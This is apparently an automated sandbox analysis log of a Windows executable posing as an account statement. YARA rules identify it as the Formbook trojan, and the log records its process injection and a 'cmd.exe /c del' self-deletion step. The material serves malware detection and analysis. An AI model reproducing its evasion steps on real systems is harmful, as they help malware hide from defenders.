Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014CDBF9 4_2_014CDBF9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AFB80 4_2_014AFB80
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01547A46 4_2_01547A46
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FA49 4_2_0154FA49
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01503A6C 4_2_01503A6C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153DAC6 4_2_0153DAC6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D5AA0 4_2_014D5AA0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01531AA3 4_2_01531AA3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152DAAC 4_2_0152DAAC
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01493D40 4_2_01493D40
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01541D5A 4_2_01541D5A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01547D73 4_2_01547D73
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AFDC0 4_2_014AFDC0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01509C32 4_2_01509C32
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FCF2 4_2_0154FCF2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FF09 4_2_0154FF09
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01453FD5 4_2_01453FD5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01453FD2 4_2_01453FD2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01491F92 4_2_01491F92
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154FFB1 4_2_0154FFB1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01499EB0 4_2_01499EB0
Source: C:\Windows\explorer.exe Code function: 7_2_09258232 7_2_09258232
Source: C:\Windows\explorer.exe Code function: 7_2_09252B30 7_2_09252B30
Source: C:\Windows\explorer.exe Code function: 7_2_09252B32 7_2_09252B32
Source: C:\Windows\explorer.exe Code function: 7_2_0924FD02 7_2_0924FD02
Source: C:\Windows\explorer.exe Code function: 7_2_09255912 7_2_09255912
Source: C:\Windows\explorer.exe Code function: 7_2_0925B5CD 7_2_0925B5CD
Source: C:\Windows\explorer.exe Code function: 7_2_09257036 7_2_09257036
Source: C:\Windows\explorer.exe Code function: 7_2_0924E082 7_2_0924E082
Source: C:\Windows\explorer.exe Code function: 7_2_106E0036 7_2_106E0036
Source: C:\Windows\explorer.exe Code function: 7_2_106D7082 7_2_106D7082
Source: C:\Windows\explorer.exe Code function: 7_2_106D8D02 7_2_106D8D02
Source: C:\Windows\explorer.exe Code function: 7_2_106DE912 7_2_106DE912
Source: C:\Windows\explorer.exe Code function: 7_2_106E45CD 7_2_106E45CD
Source: C:\Windows\explorer.exe Code function: 7_2_106E1232 7_2_106E1232
Source: C:\Windows\explorer.exe Code function: 7_2_106DBB30 7_2_106DBB30
Source: C:\Windows\explorer.exe Code function: 7_2_106DBB32 7_2_106DBB32
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00160090 9_2_00160090
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126BA3 9_2_00126BA3
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126BA8 9_2_00126BA8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00164CE0 9_2_00164CE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00170EF0 9_2_00170EF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127036 9_2_00127036
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00171337 9_2_00171337
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04134420 9_2_04134420
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04142446 9_2_04142446
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0413E4F6 9_2_0413E4F6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04090535 9_2_04090535
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04150591 9_2_04150591
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040AC6E0 9_2_040AC6E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040B4750 9_2_040B4750
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04090770 9_2_04090770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0408C7C0 9_2_0408C7C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04122000 9_2_04122000
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04080100 9_2_04080100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0412A118 9_2_0412A118
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04118158 9_2_04118158
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041441A2 9_2_041441A2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041501AA 9_2_041501AA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041481CC 9_2_041481CC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04130274 9_2_04130274
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041102C0 9_2_041102C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0414A352 9_2_0414A352
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_041503E6 9_2_041503E6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0409E3F0 9_2_0409E3F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04090C00 9_2_04090C00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04130CB5 9_2_04130CB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04080CF2 9_2_04080CF2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0409AD00 9_2_0409AD00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0412CD1F 9_2_0412CD1F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040A8DBF 9_2_040A8DBF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0408ADE0 9_2_0408ADE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0414EE26 9_2_0414EE26
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04090E59 9_2_04090E59
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0414CE93 9_2_0414CE93
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040A2E90 9_2_040A2E90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0414EEDB 9_2_0414EEDB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04132F30 9_2_04132F30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040D2F28 9_2_040D2F28
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040B0F30 9_2_040B0F30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04104F40 9_2_04104F40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0410EFA0 9_2_0410EFA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04082FC8 9_2_04082FC8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0409CFE0 9_2_0409CFE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0409A840 9_2_0409A840
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_04092840 9_2_04092840
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040768B8 9_2_040768B8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040BE8F0 9_2_040BE8F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040A6962 9_2_040A6962
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040929A0 9_2_040929A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0415A9A6 9_2_0415A9A6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0408EA80 9_2_0408EA80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0414AB40 9_2_0414AB40
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 014D7E54 appears 111 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 0150F290 appears 105 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 014C5130 appears 58 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 014FEA12 appears 86 times
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: String function: 0147B970 appears 280 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 040FEA12 appears 49 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0017318B appears 128 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0410F290 appears 80 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 00192F80 appears 922 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 040D7E54 appears 50 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 00194C81 appears 35 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0016E951 appears 387 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0407B970 appears 75 times
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 00194FF1 appears 138 times
Sample file is different than original file name gathered from version info
Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000000.2038477421.0000000000CC6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000002.2494382664.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000002.2509254740.00000000074B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRP8SH.dll, vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMiPro.dll, vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003150000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs yaM8XR1HfL.exe
Source: yaM8XR1HfL.exe Binary or memory string: OriginalFilenameStatement of Account #8363672.exeT vs yaM8XR1HfL.exe
Yara signature match
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: yaM8XR1HfL.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/1@2/1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001BED2C memset,memset,EnterCriticalSection,FormatMessageW,GetLastError,FormatMessageW,GetLastError,GetCurrentThreadId,LocalFree, 9_2_001BED2C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yaM8XR1HfL.exe.log Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: yaM8XR1HfL.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yaM8XR1HfL.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: yaM8XR1HfL.exe ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe" Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe" Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: windows.storage.dll Jump to behavior
